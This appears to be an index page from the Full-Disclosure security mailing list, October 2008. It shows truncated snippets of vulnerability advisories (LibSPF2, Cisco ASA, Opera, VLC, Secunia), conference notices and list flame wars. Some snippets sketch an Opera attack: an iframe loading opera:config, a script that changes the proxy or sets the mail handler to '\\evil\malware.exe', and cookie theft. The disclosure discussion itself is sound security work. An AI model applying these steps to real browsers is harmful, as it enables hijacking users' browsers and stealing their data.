have you forwarded this email to nytimes, wall street journal, blackhat
eu, jp, and usa, yet? We surely wouldn't want you to miss out on any press.
Dan Kaminsky wrote:
> Advisory: DNS TXT Record Parsing Bug in LibSPF2
> Author: Dan Kaminsky, Director of Penetration Testing, IOActive Inc,
> [EM
hello mr kaminsky
what size hotpants
do you wear?
this is a privacy implication
!
On Wed, 22 Oct 2008 06:14:51 +1100 Dan Kaminsky
<[EMAIL PROTECTED]> wrote:
>Advisory: DNS TXT Record Parsing Bug in LibSPF2
>Author: Dan Kaminsky, Director of Penetration Testing, IOActive
>Inc,
>[EMAIL PROTECTED
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
-
Debian Security Advisory DSA-1658-1 [EMAIL PROTECTED]
http://www.debian.org/security/ Thijs Kinkhorst
October 22, 2008
Hi,
Just found a way to use Stefano's opera:config idea to execute code from
remote.
Instead of changing the HTTP Proxy, an attacker can change the default
external mail application to "\\evil\malware.exe ", or to local commands
(e.g. ftp.exe which can be used to download malicious binaries fr
==
Secunia Research 22/10/2008
- HP OpenView Products Shared Trace Service Denial of Service -
==
Table of Contents
Affected Software
==
Secunia Research 22/10/2008
- Trend Micro OfficeScan CGI Parsing Buffer Overflows -
==
Table of Contents
Affected Software...
==
Secunia Research 22/10/2008
- GNU Enscript "setfilename" Special Escape Buffer Overflow -
==
Table of Contents
Affected Software..
FGA-2008-23:EMC NetWorker Denial of Service Vulnerability
2008.October.21
Fortinet's FortiGuard Global Security Research Team Discovers Vulnerability in
EMC NetWorker
Summary:
A resource exhaustion vulnerability exists throughout multiple EMC products
through an exploited RPC i
Advisory: DNS TXT Record Parsing Bug in LibSPF2
Author: Dan Kaminsky, Director of Penetration Testing, IOActive Inc,
[EMAIL PROTECTED] (PGP Key In Appendix)
Abstract:
A relatively common bug parsing TXT records delivered over DNS, dating
at least back to 2002 in Sendmail 8.2.0 and almost certai
__
Insomnia Security Vulnerability Advisory: ISVA-081020.1
___
Name: Altiris Deployment Server Agent - Privilege Escalation
Released: 20 October 2008
Vendor Link
The DeepSec In Depth Security Conference is happy to announce the planned
schedule for this year's event from November 11th to 14th in Vienna, Austria.
The schedule (which can be found at https://deepsec.net/schedule) covers a
range of topics including botnet analysis, web application security, ma
Please find attached a detailed advisory of the vulnerability.
Alternatively, the advisory can also be found at:
http://www.trapkit.de/advisories/TKADV2008-010.txt
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Advisory: VLC media player TiVo ty Processing Stack Overflow
---------- Forwarded message ----------
From: waveroad waveroad <[EMAIL PROTECTED]>
Date: 2008/10/22
Subject: Re: [Full-disclosure] ureleet
To: Sigma & Omicron & Beta <[EMAIL PROTECTED]>
Urleet & n3td3v why don't you fix your problems privately?
There's enough crap in this FD list, and there's no
-----Original Message-----
From: Stefano Di Paola [mailto:[EMAIL PROTECTED]
Sent: Thursday, 23 October 2008 5:41 a.m.
To: Roberto Suggi
Cc: kuza55; full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] Opera Stored Cross Site Scripting Vulnerability
>Hi guys
>I'm not a real Opera expert
Please ignore him. His worst nightmare is that we set up a filter that
will delete any email containing n3td3v. We don't care about his
licence shit or his opinions. So I don't think we will lose any
information that matters. The poor guy is going to grow up in 1 or 2
years and he will finally leave th
==
= Security Objectives Advisory (SECOBJADV-2008-05) =
==
Veritas Storage Foundation Arbitrary File Read Vulnerability
http://www.security-obj
Hi guys
I'm not a real Opera expert, but since the scheme is opera: you could
change the configuration on the fly, for example to set a remote proxy
1. add in historysearch an iframe with src='opera:config'
2. add a script into the iframe which executes:
opera.setPreference("Proxy","HTTP Server","a
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Cisco Security Advisory: Multiple Vulnerabilities in Cisco PIX and
Cisco ASA
Advisory ID: cisco-sa-20081022-asa
http://www.cisco.com/warp/public/707/cisco-sa-20081022-asa.shtml
Revision 1.0
For Public Release 2008 October 22 1600 UTC (GMT
-----Original Message-----
From: kuza55 [mailto:[EMAIL PROTECTED]
Sent: Thursday, 23 October 2008 1:25 a.m.
To: Roberto Suggi
Cc: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] Opera Stored Cross Site Scripting Vulnerability
>Is there any potential for code execution here similar
Why would n3td3v ban n3td3v from n3td3v? And why would the banning of n3td3v by
n3td3v from n3td3v make n3td3v mad?
> Date: Wed, 22 Oct 2008 04:29:13 +0100
> From: [EMAIL PROTECTED]
> To: full-disclosure@lists.grok.org.uk
> Subject: [Full-disclosure] ureleet
>
> you're just trying to ruin the r
n3td3v has no idea why n3td3v is posting highly off topic video links to FD.
Perhaps n3td3v needs to be trout slapped.
> Date: Wed, 22 Oct 2008 02:00:16 +0100
> From: [EMAIL PROTECTED]
> To: full-disclosure@lists.grok.org.uk
> Subject: Re: [Full-disclosure] marcus sachs
>
> he should come ont
Advisory for Oracle CPU October 2008 - APEX FLOWS excessive privileges
==
See http://www.petefinnigan.com/Advisory_CPU_Oct_2008.htm for details
Description
---
Oracle Application Express (APEX) is a rapid development tool
Is there any potential for code execution here similar to XSS bugs in
Firefox's chrome:// context or in IE's Local Zone?
Also, you have a PoC which extracts document.cookie; which cookie does
this acquire? From my understanding of this advisory the xss is
rendered in opera:historysearch rather tha
==
=
= Opera Stored Cross Site Scripting Vulnerability
=
= Vendor Website:
= http://www.opera.com
=
= Affected Version:
= -- All desktop versions
=
= Public disclosure on 22nd October 2008
=
==